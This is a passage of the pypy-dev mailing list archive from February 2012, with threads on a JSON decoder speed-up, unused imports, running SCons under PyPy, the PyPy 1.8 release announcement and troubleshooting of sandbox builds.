and just > wanted to know what the status of it was. Was there ever much of an > improvement in using PyPy with LLVM for code generation? Does the > binary install of PyPy use LLVM? > > Thanks for the info, > > Timothy Hi PyPy's LLVM backend has been tried and discontinued several times, because we always run into some LLVM limitations or bugs or both. It would probably be interesting to try again at some time, to *actually* see what the improvements would be. Cheers, fijal From s.parmesan at gmail.com Tue Feb 7 11:27:22 2012 From: s.parmesan at gmail.com (Stefano Parmesan) Date: Tue, 7 Feb 2012 11:27:22 +0100 Subject: [pypy-dev] JSON decoder speed-up Message-ID: Hi everybody, A while ago I submitted a pull-request after cleaning a bit the source code of the JSON decoder, if anybody wants to check it out, it's here: https://bitbucket.org/pypy/pypy/pull-request/26/json-decoder-speed-up Some experimental tests here, if you are interested: http://armisael.silix.org/2012/01/speeding-up-json-decoder-in-pypy/ (not enormous speed-ups, but still...) Cheers! -- Dott. Stefano Parmesan PhD Student ~ University of Trento From cfbolz at gmx.de Tue Feb 7 11:33:50 2012 From: cfbolz at gmx.de (Carl Friedrich Bolz) Date: Tue, 07 Feb 2012 11:33:50 +0100 Subject: [pypy-dev] Please, someone, send this patch In-Reply-To: References: Message-ID: <4F30FE0E.4090906@gmx.de> On 02/06/2012 04:06 PM, Alexander Sedov wrote: > Wasted two hours trying to get into IRC channel and post this. Please > someone, commit this minor, useless patch. > http://paste.pocoo.org/show/546747/ Hi Alexander, thanks for noticing and sorry to hear about IRC. Benjamin committed the patch: bitbucket.org/pypy/pypy/changeset/e112d1cfaa95/ He also added a test, which in general should come together with a patch. Cheers, Carl Friedrich From fijall at gmail.com Tue Feb 7 11:43:10 2012 From: fijall at gmail.com (Maciej Fijalkowski) Date: Tue, 7 Feb 2012 12:43:10 +0200 Subject: [pypy-dev] JSON decoder speed-up In-Reply-To: References: Message-ID: On Tue, Feb 7, 2012 at 12:27 PM, Stefano Parmesan wrote: > Hi everybody, > > A while ago I submitted a pull-request after cleaning a bit the source code > of the JSON decoder, if anybody wants to check it out, it's > here:?https://bitbucket.org/pypy/pypy/pull-request/26/json-decoder-speed-up > Some experimental tests here, if you are interested: > http://armisael.silix.org/2012/01/speeding-up-json-decoder-in-pypy/ > > (not enormous speed-ups, but still...) > > Cheers! Hey. I've been eyeing this (it's on my TODO list) for a while and I keep that in mind. However, as we're closing to the release I would not like to merge this without a through review and I simply did not have time for that recently at all. Apologies for this taking so long (it should not be that long) and I hope to review this really soon. Cheers, fijal From s.parmesan at gmail.com Tue Feb 7 11:52:56 2012 From: s.parmesan at gmail.com (Stefano Parmesan) Date: Tue, 7 Feb 2012 11:52:56 +0100 Subject: [pypy-dev] JSON decoder speed-up In-Reply-To: References: Message-ID: Right, I forgot about the 1.8 release. No worries, and thank you! -- Dott. Stefano Parmesan PhD Student ~ University of Trento wrote: > On Tue, Feb 7, 2012 at 12:27 PM, Stefano Parmesan > wrote: > > Hi everybody, > > > > A while ago I submitted a pull-request after cleaning a bit the source > code > > of the JSON decoder, if anybody wants to check it out, it's > > here: > https://bitbucket.org/pypy/pypy/pull-request/26/json-decoder-speed-up > > Some experimental tests here, if you are interested: > > http://armisael.silix.org/2012/01/speeding-up-json-decoder-in-pypy/ > > > > (not enormous speed-ups, but still...) > > > > Cheers! > > Hey. > > I've been eyeing this (it's on my TODO list) for a while and I keep > that in mind. However, as we're closing to the release I would not > like to merge this without a through review and I simply did not have > time for that recently at all. Apologies for this taking so long (it > should not be that long) and I hope to review this really soon. > > Cheers, > fijal > -------------- next part -------------- An HTML attachment was scrubbed... URL: From santagada at gmail.com Tue Feb 7 14:02:38 2012 From: santagada at gmail.com (Leonardo Santagada) Date: Tue, 7 Feb 2012 11:02:38 -0200 Subject: [pypy-dev] JSON decoder speed-up In-Reply-To: References: Message-ID: On Tue, Feb 7, 2012 at 8:27 AM, Stefano Parmesan wrote: > Some experimental tests here, if you are interested: > http://armisael.silix.org/2012/01/speeding-up-json-decoder-in-pypy/ Looking at your post I see that you used https://github.com/kracekumar/cerealization/ to measure performance, Couldn't this be added to the spee.pypy.org benchmark set? Probably after the 1.8 release too. -- Leonardo Santagada From s.parmesan at gmail.com Tue Feb 7 15:27:08 2012 From: s.parmesan at gmail.com (Stefano Parmesan) Date: Tue, 7 Feb 2012 15:27:08 +0100 Subject: [pypy-dev] Unused imports Message-ID: Hi everybody, I notice that the pypy source code is sprinkled with unused imports, does anybody know if this affects in any way performance? Are they automatically removed in some way? -- Dott. Stefano Parmesan PhD Student ~ University of Trento From arigo at tunes.org Tue Feb 7 15:36:07 2012 From: arigo at tunes.org (Armin Rigo) Date: Tue, 7 Feb 2012 15:36:07 +0100 Subject: [pypy-dev] Unused imports In-Reply-To: References: Message-ID: Hi Stefano, On Tue, Feb 7, 2012 at 15:27, Stefano Parmesan wrote: > I notice that the pypy source code is sprinkled with unused imports, does > anybody know if this affects in any way performance? Are they automatically > removed in some way? No performance impact. It's just a matter of clarity: it would be nice if someone could provide a clean-up. A bient?t, Armin. From s.parmesan at gmail.com Tue Feb 7 15:59:59 2012 From: s.parmesan at gmail.com (Stefano Parmesan) Date: Tue, 7 Feb 2012 15:59:59 +0100 Subject: [pypy-dev] Unused imports In-Reply-To: References: Message-ID: That may take a while =) pylint would help here, though... Sounds counterintuitive, but if it doesn't affect performance it's okay, I guess Thanks! -- Dott. Stefano Parmesan PhD Student ~ University of Trento wrote: > Hi Stefano, > > On Tue, Feb 7, 2012 at 15:27, Stefano Parmesan > wrote: > > I notice that the pypy source code is sprinkled with unused imports, does > > anybody know if this affects in any way performance? Are they > automatically > > removed in some way? > > No performance impact. It's just a matter of clarity: it would be > nice if someone could provide a clean-up. > > > A bient?t, > > Armin. > -------------- next part -------------- An HTML attachment was scrubbed... URL: From fijall at gmail.com Tue Feb 7 16:12:19 2012 From: fijall at gmail.com (Maciej Fijalkowski) Date: Tue, 7 Feb 2012 17:12:19 +0200 Subject: [pypy-dev] Unused imports In-Reply-To: References: Message-ID: On Tue, Feb 7, 2012 at 4:59 PM, Stefano Parmesan wrote: > That may take a while =)?pylint would help here, though... > > Sounds counterintuitive, but if it doesn't affect performance it's okay, I > guess > > Thanks! pyflakes is better at it btw (less false-positives) and faster. I remove it each time I open a file, but it takes a while. From alex0player at gmail.com Wed Feb 8 08:49:45 2012 From: alex0player at gmail.com (Alexander Sedov) Date: Wed, 8 Feb 2012 11:49:45 +0400 Subject: [pypy-dev] Please, someone, send this patch In-Reply-To: <4F30FE0E.4090906@gmx.de> References: <4F30FE0E.4090906@gmx.de> Message-ID: 2012/2/7 Carl Friedrich Bolz : > On 02/06/2012 04:06 PM, Alexander Sedov wrote: >> >> Wasted two hours trying to get into IRC channel and post this. Please >> someone, commit this minor, useless patch. >> http://paste.pocoo.org/show/546747/ > > > Hi Alexander, > > thanks for noticing and sorry to hear about IRC. Benjamin committed the > patch: > > bitbucket.org/pypy/pypy/changeset/e112d1cfaa95/ > > He also added a test, which in general should come together with a patch. > > Cheers, > > Carl Friedrich Glad to hear. Also, thanks Benjamin for the test. I'm not really into PyPy testing system. From russel at russel.org.uk Wed Feb 8 18:40:47 2012 From: russel at russel.org.uk (Russel Winder) Date: Wed, 08 Feb 2012 17:40:47 +0000 Subject: [pypy-dev] Seeking a bit of guidance Message-ID: <1328722847.9949.31.camel@anglides.russel.org.uk> For some reason I had assumed that pypy could be a drop in replacement for python. I am on Debian Unstable and I am suspected that my assumption is being thwarted. In particular in trying to run SCons. |> python /home/Checkouts/Mercurial/SCons/bootstrap/src/script/scons.py scons: Reading SConscript files ... scons: done reading SConscript files. scons: Building targets ... stopServerIfNeedBe(["allPDFs"], []) scons: done building targets. |> pypy /home/Checkouts/Mercurial/SCons/bootstrap/src/script/scons.py Traceback (most recent call last): File "app_main.py", line 51, in run_toplevel File "/home/Checkouts/Mercurial/SCons/bootstrap/src/script/scons.py", line 187, in import SCons.Script ImportError: No module named SCons This may be a SCons problem or a Debian Python packaging issue but higher likelihood is a PyPy configuration issue? Basically I am not sure where to start. I use SCons from a Mercurial clone, Python from Debian packages, PyPy from then downloaded binary distribution. |> python --version Python 2.7.2+ |> pypy --version Python 2.7.1 (7773f8fc4223, Nov 18 2011, 18:47:11) [PyPy 1.7.0 with GCC 4.4.3] Help and guidance greatfully received. Thanks. -- Russel. ============================================================================= Dr Russel Winder t: +44 20 7585 2200 voip: sip:russel.winder at ekiga.net 41 Buckmaster Road m: +44 7770 465 077 xmpp: russel at russel.org.uk London SW11 1EN, UK w: www.russel.org.uk skype: russel_winder -------------- next part -------------- A non-text attachment was scrubbed... Name: signature.asc Type: application/pgp-signature Size: 198 bytes Desc: This is a digitally signed message part URL: From fijall at gmail.com Wed Feb 8 18:51:43 2012 From: fijall at gmail.com (Maciej Fijalkowski) Date: Wed, 8 Feb 2012 19:51:43 +0200 Subject: [pypy-dev] Seeking a bit of guidance In-Reply-To: <1328722847.9949.31.camel@anglides.russel.org.uk> References: <1328722847.9949.31.camel@anglides.russel.org.uk> Message-ID: On Wed, Feb 8, 2012 at 7:40 PM, Russel Winder wrote: > For some reason I had assumed that pypy could be a drop in replacement > for python. ?I am on Debian Unstable and I am suspected that my > assumption is being thwarted. ?In particular in trying to run SCons. > > |> python /home/Checkouts/Mercurial/SCons/bootstrap/src/script/scons.py > scons: Reading SConscript files ... > scons: done reading SConscript files. > scons: Building targets ... > stopServerIfNeedBe(["allPDFs"], []) > scons: done building targets. > > |> pypy /home/Checkouts/Mercurial/SCons/bootstrap/src/script/scons.py > Traceback (most recent call last): > ?File "app_main.py", line 51, in run_toplevel > ?File "/home/Checkouts/Mercurial/SCons/bootstrap/src/script/scons.py", line 187, in > ? ?import SCons.Script > ImportError: No module named SCons > > This may be a SCons problem or a Debian Python packaging issue but > higher likelihood is a PyPy configuration issue? ?Basically I am not > sure where to start. > > I use SCons from a Mercurial clone, Python from Debian packages, PyPy > from then downloaded binary distribution. > > |> python --version > Python 2.7.2+ > > |> pypy --version > Python 2.7.1 (7773f8fc4223, Nov 18 2011, 18:47:11) > [PyPy 1.7.0 with GCC 4.4.3] > > Help and guidance greatfully received. ?Thanks. > -- > Russel. > ============================================================================= > Dr Russel Winder ? ? ?t: +44 20 7585 2200 ? voip: sip:russel.winder at ekiga.net > 41 Buckmaster Road ? ?m: +44 7770 465 077 ? xmpp: russel at russel.org.uk > London SW11 1EN, UK ? w: www.russel.org.uk ?skype: russel_winder > > _______________________________________________ > pypy-dev mailing list > pypy-dev at python.org > http://mail.python.org/mailman/listinfo/pypy-dev > Hey PyPy does not automatically pick up python packages installed for the system python. The same would actually be true for CPython if you installed it from sources. I suggest using virtualenv and creating one with pypy as an executable and then installing stuff using pip or easy_install. Cheers, fijal From arigo at tunes.org Wed Feb 8 18:57:50 2012 From: arigo at tunes.org (Armin Rigo) Date: Wed, 8 Feb 2012 18:57:50 +0100 Subject: [pypy-dev] Seeking a bit of guidance In-Reply-To: <1328722847.9949.31.camel@anglides.russel.org.uk> References: <1328722847.9949.31.camel@anglides.russel.org.uk> Message-ID: Hi Russel, On Wed, Feb 8, 2012 at 18:40, Russel Winder wrote: > ImportError: No module named SCons You need to install SCons for this PyPy. That's just the same as installing it manually for the particular version of CPython you're testing: you get its sources and run "pypy setup.py install". The difference is that SCons is also available as a package in your Linux distribution; this package is for CPython 2.7 --- a particular version of CPython. The Debian package of SCons would not work with a different version of CPython, nor with PyPy. A bient?t, Armin. From russel at russel.org.uk Wed Feb 8 19:24:31 2012 From: russel at russel.org.uk (Russel Winder) Date: Wed, 08 Feb 2012 18:24:31 +0000 Subject: [pypy-dev] Seeking a bit of guidance In-Reply-To: References: <1328722847.9949.31.camel@anglides.russel.org.uk> Message-ID: <1328725471.9949.60.camel@anglides.russel.org.uk> Maciej, Armin, A combined response... On Wed, 2012-02-08 at 19:51 +0200, Maciej Fijalkowski wrote: > PyPy does not automatically pick up python packages installed for the > system python. The same would actually be true for CPython if you > installed it from sources. I suggest using virtualenv and creating one > with pypy as an executable and then installing stuff using pip or > easy_install. On Wed, 2012-02-08 at 18:57 +0100, Armin Rigo wrote: Hi Russel, > > On Wed, Feb 8, 2012 at 18:40, Russel Winder wrote: > > ImportError: No module named SCons > > You need to install SCons for this PyPy. That's just the same as > installing it manually for the particular version of CPython you're > testing: you get its sources and run "pypy setup.py install". The > difference is that SCons is also available as a package in your Linux > distribution; this package is for CPython 2.7 --- a particular version > of CPython. The Debian package of SCons would not work with a > different version of CPython, nor with PyPy. I understand the points being made above, and I really appreciate the speedy replies, thanks to you both. However, due to my bad explanation I suspect, I think we may be at cross purposes. I do indeed have the Debian SCons package installed, but as far as I know I am not actually making use of any of it -- but this is more an hypothesis than any actual fact. If I was installing SCons then clearly it would need installing separately for CPython and PyPy as each Python installation maintains its own package set (*). However I am running SCons directly from a Mercurial repository, using the boostrap.py code which manipulates paths and spawns a subprocess to ensure the subprocess has the right "environment". What I should perhaps have said more explicitly is that my problem is that python executes this script and everything works whereas pypy doesn't execute the script in the same way. The script in question is: https://bitbucket.org/scons/scons/src/cdc0f05249c6/bootstrap.py I don't immediately see why PyPy would behave different executing this script that the CPython 2.7.2 that works fine. I am increasingly of the view that I am looking but not seeing... (*) Though I do like the Debian solution of depositing things in a shared location and then appearing to install them for each installed Python. -- Russel. ============================================================================= Dr Russel Winder t: +44 20 7585 2200 voip: sip:russel.winder at ekiga.net 41 Buckmaster Road m: +44 7770 465 077 xmpp: russel at russel.org.uk London SW11 1EN, UK w: www.russel.org.uk skype: russel_winder -------------- next part -------------- A non-text attachment was scrubbed... Name: signature.asc Type: application/pgp-signature Size: 198 bytes Desc: This is a digitally signed message part URL: From russel at russel.org.uk Wed Feb 8 19:32:56 2012 From: russel at russel.org.uk (Russel Winder) Date: Wed, 08 Feb 2012 18:32:56 +0000 Subject: [pypy-dev] Seeking a bit of guidance In-Reply-To: <1328725471.9949.60.camel@anglides.russel.org.uk> References: <1328722847.9949.31.camel@anglides.russel.org.uk> <1328725471.9949.60.camel@anglides.russel.org.uk> Message-ID: <1328725976.9949.64.camel@anglides.russel.org.uk> On Wed, 2012-02-08 at 18:24 +0000, Russel Winder wrote: [...] > whereas pypy doesn't execute the script in the same way. The script in > question is: > > https://bitbucket.org/scons/scons/src/cdc0f05249c6/bootstrap.py > > I don't immediately see why PyPy would behave different executing this > script that the CPython 2.7.2 that works fine. I am increasingly of the > view that I am looking but not seeing... Aha... that is the point, that script is behaving exactly the same in both cases, I was using the wrong command line. |> python /home/Checkouts/Mercurial/SCons/bootstrap.py /usr/bin/python /home/Checkouts/Mercurial/SCons/bootstrap/src/script/scons.py scons: Reading SConscript files ... scons: done reading SConscript files. scons: Building targets ... stopServerIfNeedBe(["allPDFs"], []) scons: done building targets. |> pypy /home/Checkouts/Mercurial/SCons/bootstrap.py /home/users/russel/bin.Linux.x86_64/pypy /home/Checkouts/Mercurial/SCons/bootstrap/src/script/scons.py scons: Reading SConscript files ... ImportError: No module named uno: File "/home/users/russel/Work/Courses/Groovy_OneDayWorkshop/SConstruct", line 21: import odfConverterServer File "/home/users/russel/lib/Python/lib/python2.7/odfConverterServer.py", line 27: from PyODFConverter import DEFAULT_OPENOFFICE_PORT , DocumentConverter , DocumentConversionException File "/home/users/russel/lib/Python/lib/python2.7/PyODFConverter.py", line 40: from uno import getComponentContext , systemPathToFileUrl Now that makes much more sense. Now I just need to get some packages into the PyPy tree that are not there yet. Maciej, Armin, thanks for indirectly pointing me in the right direction. -- Russel. ============================================================================= Dr Russel Winder t: +44 20 7585 2200 voip: sip:russel.winder at ekiga.net 41 Buckmaster Road m: +44 7770 465 077 xmpp: russel at russel.org.uk London SW11 1EN, UK w: www.russel.org.uk skype: russel_winder -------------- next part -------------- A non-text attachment was scrubbed... Name: signature.asc Type: application/pgp-signature Size: 198 bytes Desc: This is a digitally signed message part URL: From fijall at gmail.com Wed Feb 8 20:52:24 2012 From: fijall at gmail.com (Maciej Fijalkowski) Date: Wed, 8 Feb 2012 21:52:24 +0200 Subject: [pypy-dev] JSON decoder speed-up In-Reply-To: References: Message-ID: On Tue, Feb 7, 2012 at 12:52 PM, Stefano Parmesan wrote: > Right, I forgot about the 1.8 release. No worries, and thank you! For what is worth the branch fails tests. > > -- > Dott. Stefano Parmesan > PhD Student ~ University of Trento > Tel: 0461-235794 ext. 5544 > > > > On 7 February 2012 11:43, Maciej Fijalkowski wrote: >> >> On Tue, Feb 7, 2012 at 12:27 PM, Stefano Parmesan >> wrote: >> > Hi everybody, >> > >> > A while ago I submitted a pull-request after cleaning a bit the source >> > code >> > of the JSON decoder, if anybody wants to check it out, it's >> > >> > here:?https://bitbucket.org/pypy/pypy/pull-request/26/json-decoder-speed-up >> > Some experimental tests here, if you are interested: >> > http://armisael.silix.org/2012/01/speeding-up-json-decoder-in-pypy/ >> > >> > (not enormous speed-ups, but still...) >> > >> > Cheers! >> >> Hey. >> >> I've been eyeing this (it's on my TODO list) for a while and I keep >> that in mind. However, as we're closing to the release I would not >> like to merge this without a through review and I simply did not have >> time for that recently at all. Apologies for this taking so long (it >> should not be that long) and I hope to review this really soon. >> >> Cheers, >> fijal > > From fijall at gmail.com Wed Feb 8 21:03:06 2012 From: fijall at gmail.com (Maciej Fijalkowski) Date: Wed, 8 Feb 2012 22:03:06 +0200 Subject: [pypy-dev] JSON decoder speed-up In-Reply-To: References: Message-ID: On Wed, Feb 8, 2012 at 9:52 PM, Maciej Fijalkowski wrote: > On Tue, Feb 7, 2012 at 12:52 PM, Stefano Parmesan wrote: >> Right, I forgot about the 1.8 release. No worries, and thank you! > > For what is worth the branch fails tests. No, sorry, my bad, it's my old pypy > >> >> -- >> Dott. Stefano Parmesan >> PhD Student ~ University of Trento >> > Tel: 0461-235794 ext. 5544 >> >> >> >> On 7 February 2012 11:43, Maciej Fijalkowski wrote: >>> >>> On Tue, Feb 7, 2012 at 12:27 PM, Stefano Parmesan >>> wrote: >>> > Hi everybody, >>> > >>> > A while ago I submitted a pull-request after cleaning a bit the source >>> > code >>> > of the JSON decoder, if anybody wants to check it out, it's >>> > >>> > here:?https://bitbucket.org/pypy/pypy/pull-request/26/json-decoder-speed-up >>> > Some experimental tests here, if you are interested: >>> > http://armisael.silix.org/2012/01/speeding-up-json-decoder-in-pypy/ >>> > >>> > (not enormous speed-ups, but still...) >>> > >>> > Cheers! >>> >>> Hey. >>> >>> I've been eyeing this (it's on my TODO list) for a while and I keep >>> that in mind. However, as we're closing to the release I would not >>> like to merge this without a through review and I simply did not have >>> time for that recently at all. Apologies for this taking so long (it >>> should not be that long) and I hope to review this really soon. >>> >>> Cheers, >>> fijal >> >> From fijall at gmail.com Fri Feb 10 10:44:33 2012 From: fijall at gmail.com (Maciej Fijalkowski) Date: Fri, 10 Feb 2012 11:44:33 +0200 Subject: [pypy-dev] PyPy 1.8 released Message-ID: ============================ PyPy 1.8 - business as usual ============================ We're pleased to announce the 1.8 release of PyPy. As habitual this release brings a lot of bugfixes, together with performance and memory improvements over the 1.7 release. The main highlight of the release is the introduction of `list strategies`_ which makes homogenous lists more efficient both in terms of performance and memory. This release also upgrades us from Python 2.7.1 compatibility to 2.7.2. Otherwise it's "business as usual" in the sense that performance improved roughly 10% on average since the previous release. you can download the PyPy 1.8 release here: http://pypy.org/download.html .. _`list strategies`: http://morepypy.blogspot.com/2011/10/more-compact-lists-with-list-strategies.html What is PyPy? ============= PyPy is a very compliant Python interpreter, almost a drop-in replacement for CPython 2.7. It's fast (`pypy 1.8 and cpython 2.7.1`_ performance comparison) due to its integrated tracing JIT compiler. This release supports x86 machines running Linux 32/64, Mac OS X 32/64 or Windows 32. Windows 64 work has been stalled, we would welcome a volunteer to handle that. .. _`pypy 1.8 and cpython 2.7.1`: http://speed.pypy.org Highlights ========== * List strategies. Now lists that contain only ints or only floats should be as efficient as storing them in a binary-packed array. It also improves the JIT performance in places that use such lists. There are also special strategies for unicode and string lists. * As usual, numerous performance improvements. There are many examples of python constructs that now should be faster; too many to list them. * Bugfixes and compatibility fixes with CPython. * Windows fixes. * NumPy effort progress; for the exact list of things that have been done, consult the `numpy status page`_. A tentative list of things that has been done: * multi dimensional arrays * various sizes of dtypes * a lot of ufuncs * a lot of other minor changes Right now the `numpy` module is available under both `numpy` and `numpypy` names. However, because it's incomplete, you have to `import numpypy` first before doing any imports from `numpy`. * New JIT hooks that allow you to hook into the JIT process from your python program. There is a `brief overview`_ of what they offer. * Standard library upgrade from 2.7.1 to 2.7.2. Ongoing work ============ As usual, there is quite a bit of ongoing work that either didn't make it to the release or is not ready yet. Highlights include: * Non-x86 backends for the JIT: ARMv7 (almost ready) and PPC64 (in progress) * Specialized type instances - allocate instances as efficient as C structs, including type specialization * More numpy work * Since the last release there was a significant breakthrough in PyPy's fundraising. We now have enough funds to work on first stages of `numpypy`_ and `py3k`_. We would like to thank again to everyone who donated. * It's also probably worth noting, we're considering donations for the Software Transactional Memory project. You can read more about `our plans`_ Cheers, The PyPy Team .. _`brief overview`: http://doc.pypy.org/en/latest/jit-hooks.html .. _`numpy status page`: http://buildbot.pypy.org/numpy-status/latest.html .. _`numpy status update blog report`: http://morepypy.blogspot.com/2012/01/numpypy-status-update.html .. _`numpypy`: http://pypy.org/numpydonate.html .. _`py3k`: http://pypy.org/py3donate.html .. _`our plans`: http://morepypy.blogspot.com/2012/01/transactional-memory-ii.html From dynamicgl at gmail.com Fri Feb 10 11:46:56 2012 From: dynamicgl at gmail.com (gelin yan) Date: Fri, 10 Feb 2012 18:46:56 +0800 Subject: [pypy-dev] PyPy 1.8 released In-Reply-To: References: Message-ID: On Fri, Feb 10, 2012 at 5:44 PM, Maciej Fijalkowski wrote: > ============================ > PyPy 1.8 - business as usual > ============================ > > We're pleased to announce the 1.8 release of PyPy. As habitual this > release brings a lot of bugfixes, together with performance and memory > improvements over the 1.7 release. The main highlight of the release > is the introduction of `list strategies`_ which makes homogenous lists > more efficient both in terms of performance and memory. This release > also upgrades us from Python 2.7.1 compatibility to 2.7.2. Otherwise > it's "business as usual" in the sense that performance improved > roughly 10% on average since the previous release. > > you can download the PyPy 1.8 release here: > > http://pypy.org/download.html > > .. _`list strategies`: > > http://morepypy.blogspot.com/2011/10/more-compact-lists-with-list-strategies.html > > What is PyPy? > ============= > > PyPy is a very compliant Python interpreter, almost a drop-in replacement > for > CPython 2.7. It's fast (`pypy 1.8 and cpython 2.7.1`_ performance > comparison) > due to its integrated tracing JIT compiler. > > This release supports x86 machines running Linux 32/64, Mac OS X 32/64 or > Windows 32. Windows 64 work has been stalled, we would welcome a volunteer > to handle that. > > .. _`pypy 1.8 and cpython 2.7.1`: http://speed.pypy.org > > > Highlights > ========== > > * List strategies. Now lists that contain only ints or only floats should > be as efficient as storing them in a binary-packed array. It also improves > the JIT performance in places that use such lists. There are also special > strategies for unicode and string lists. > > * As usual, numerous performance improvements. There are many examples > of python constructs that now should be faster; too many to list them. > > * Bugfixes and compatibility fixes with CPython. > > * Windows fixes. > > * NumPy effort progress; for the exact list of things that have been done, > consult the `numpy status page`_. A tentative list of things that has > been done: > > * multi dimensional arrays > > * various sizes of dtypes > > * a lot of ufuncs > > * a lot of other minor changes > > Right now the `numpy` module is available under both `numpy` and `numpypy` > names. However, because it's incomplete, you have to `import numpypy` > first > before doing any imports from `numpy`. > > * New JIT hooks that allow you to hook into the JIT process from your > python > program. There is a `brief overview`_ of what they offer. > > * Standard library upgrade from 2.7.1 to 2.7.2. > > Ongoing work > ============ > > As usual, there is quite a bit of ongoing work that either didn't make it > to > the release or is not ready yet. Highlights include: > > * Non-x86 backends for the JIT: ARMv7 (almost ready) and PPC64 (in > progress) > > * Specialized type instances - allocate instances as efficient as C > structs, > including type specialization > > * More numpy work > > * Since the last release there was a significant breakthrough in PyPy's > fundraising. We now have enough funds to work on first stages of > `numpypy`_ > and `py3k`_. We would like to thank again to everyone who donated. > > * It's also probably worth noting, we're considering donations for the > Software Transactional Memory project. You can read more about `our > plans`_ > > Cheers, > The PyPy Team > > .. _`brief overview`: http://doc.pypy.org/en/latest/jit-hooks.html > .. _`numpy status page`: http://buildbot.pypy.org/numpy-status/latest.html > .. _`numpy status update blog report`: > http://morepypy.blogspot.com/2012/01/numpypy-status-update.html > .. _`numpypy`: http://pypy.org/numpydonate.html > .. _`py3k`: http://pypy.org/py3donate.html > .. _`our plans`: > http://morepypy.blogspot.com/2012/01/transactional-memory-ii.html > _______________________________________________ > pypy-dev mailing list > pypy-dev at python.org > http://mail.python.org/mailman/listinfo/pypy-dev > a great job...I will give a try tonight... -------------- next part -------------- An HTML attachment was scrubbed... URL: From phyo.arkarlwin at gmail.com Fri Feb 10 16:30:32 2012 From: phyo.arkarlwin at gmail.com (Phyo Arkar) Date: Fri, 10 Feb 2012 22:00:32 +0630 Subject: [pypy-dev] pypy rsocket problem In-Reply-To: <4F2E9B54.3090501@oz.net> References: <4F2E3B68.20506@gmx.de> <4F2E9B54.3090501@oz.net> Message-ID: :D That made me sprew all the copy over my laptop! On Sun, Feb 5, 2012 at 9:38 PM, Bengt Richter wrote: > On 02/05/2012 12:18 AM Ronny Pfannschmidt wrote: > >> rpython is NOT indented for app-level development. >> > Does indentation work differently in rpython? > > Regards, > Bengt Richter > Sorry, could not resist ;-) > > > ______________________________**_________________ > pypy-dev mailing list > pypy-dev at python.org > http://mail.python.org/**mailman/listinfo/pypy-dev > -------------- next part -------------- An HTML attachment was scrubbed... URL: From kracethekingmaker at gmail.com Sun Feb 12 00:12:54 2012 From: kracethekingmaker at gmail.com (kracekumar ramaraju) Date: Sun, 12 Feb 2012 04:42:54 +0530 Subject: [pypy-dev] Unable to run sandbox pypy Message-ID: Hello I am on Centos 64 bit (cat /proc/version => Linux version 2.6.32-220.4.1.el6.x86_64 (mockbuild at c6b18n1.dev.centos.org) (gcc version 4.4.6 20110731 (Red Hat 4.4.6-3) (GCC) ) #1 SMP Tue Jan 24 02:13:44 GMT 2012) so i aussume its RH 4.4.6-3 version. On running *nohup /home/kracekumar/src/pypy-1.7/bin/pypy pypy/pypy/translator/goal/translate.py -O2 --sandbox & * , no hup exited . here is tail -10 nohup.out [platform:execute] gcc -c -O3 -pthread -fomit-frame-pointer -Wall -Wno-unused /home/kracekumar/opt/usession-master-0/platcheck_20.c -o /home/kracekumar/opt/usession-master-0/platcheck_20.o [platform:execute] gcc /home/kracekumar/opt/usession-master-0/platcheck_20.o -pthread -lrt -o /home/kracekumar/opt/usession-master-0/platcheck_20 [platform:execute] gcc -c -O3 -pthread -fomit-frame-pointer -Wall -Wno-unused /home/kracekumar/opt/usession-master-0/platcheck_21.c -o /home/kracekumar/opt/usession-master-0/platcheck_21.o [platform:execute] gcc /home/kracekumar/opt/usession-master-0/platcheck_21.o -pthread -lrt -o /home/kracekumar/opt/usession-master-0/platcheck_21 [platform:execute] gcc -c -O3 -pthread -fomit-frame-pointer -Wall -Wno-unused /home/kracekumar/opt/usession-master-0/platcheck_22.c -o /home/kracekumar/opt/usession-master-0/platcheck_22.o [platform:execute] gcc /home/kracekumar/opt/usession-master-0/platcheck_22.o -pthread -lrt -o /home/kracekumar/opt/usession-master-0/platcheck_22 [platform:execute] gcc -c -O3 -pthread -fomit-frame-pointer -Wall -Wno-unused /home/kracekumar/opt/usession-master-0/platcheck_23.c -o /home/kracekumar/opt/usession-master-0/platcheck_23.o [platform:execute] gcc /home/kracekumar/opt/usession-master-0/platcheck_23.o -pthread -lrt -o /home/kracekumar/opt/usession-master-0/platcheck_23 [platform:execute] gcc -c -O3 -pthread -fomit-frame-pointer -Wall -Wno-unused /home/kracekumar/opt/usession-master-0/platcheck_24.c -o /home/kracekumar/opt/usession-master-0/platcheck_24.o [platform:execute] gcc /home/kracekumar/opt/usession-master-0/platcheck_24.o -pthread -lrt -o /home/kracekumar/opt/usession-master-0/platcheck_24 I using pypy1.7 and Tried with pypy1.8 too no progress and same error. -- * Thanks & Regards "Talk is cheap, show me the code" -- Linus Torvalds kracekumar www.kracekumar.com * -------------- next part -------------- An HTML attachment was scrubbed... URL: From kracethekingmaker at gmail.com Sun Feb 12 01:59:31 2012 From: kracethekingmaker at gmail.com (kracekumar ramaraju) Date: Sun, 12 Feb 2012 06:29:31 +0530 Subject: [pypy-dev] Unable to get pypy sandbix running Message-ID: Hi I am on ubuntu 11.10 on 32 bit OS. I ran all the procedures to get sanbox env. Now I am unable to run sandboxed interpreter. kracekumar at python-lover:~/pypy-pypy-2346207d9946/pypy/translator/sandbox$ ls autopath.py __init__.py interact.py rsandbox.py sandlib.py script.py vfs.py virtualtmp autopath.pyc __init__.pyc pypy_interact.py rsandbox.pyc sandlib.pyc test vfs.pyc kracekumar at python-lover:~/pypy-pypy-2346207d9946/pypy/translator/sandbox$ ls virtualtmp/ script.py kracekumar at python-lover:~/pypy-pypy-2346207d9946/pypy/translator/sandbox$ ./pypy_interact.py --tmp=virtualtmp pypy-c /tmp/script.py ['/bin/pypy-c', '/tmp/script.py'] Traceback (most recent call last): File "./pypy_interact.py", line 121, in tmpdir=tmpdir, debug=debug) File "./pypy_interact.py", line 44, in __init__ executable=executable) File "/home/kracekumar/pypy-pypy-2346207d9946/pypy/translator/sandbox/sandlib.py", line 423, in __init__ super(VirtualizedSandboxedProc, self).__init__(*args, **kwds) File "/home/kracekumar/pypy-pypy-2346207d9946/pypy/translator/sandbox/sandlib.py", line 147, in __init__ env={}) File "/usr/lib/python2.7/subprocess.py", line 679, in __init__ errread, errwrite) File "/usr/lib/python2.7/subprocess.py", line 1239, in _execute_child raise child_exception OSError: [Errno 2] No such file or directory Inside sandlib at line no 146, added print args. am i missing some thing ? -- * Thanks & Regards "Talk is cheap, show me the code" -- Linus Torvalds kracekumar www.kracekumar.com * -------------- next part -------------- An HTML attachment was scrubbed... URL: From blendmaster1024 at gmail.com Sun Feb 12 02:02:03 2012 From: blendmaster1024 at gmail.com 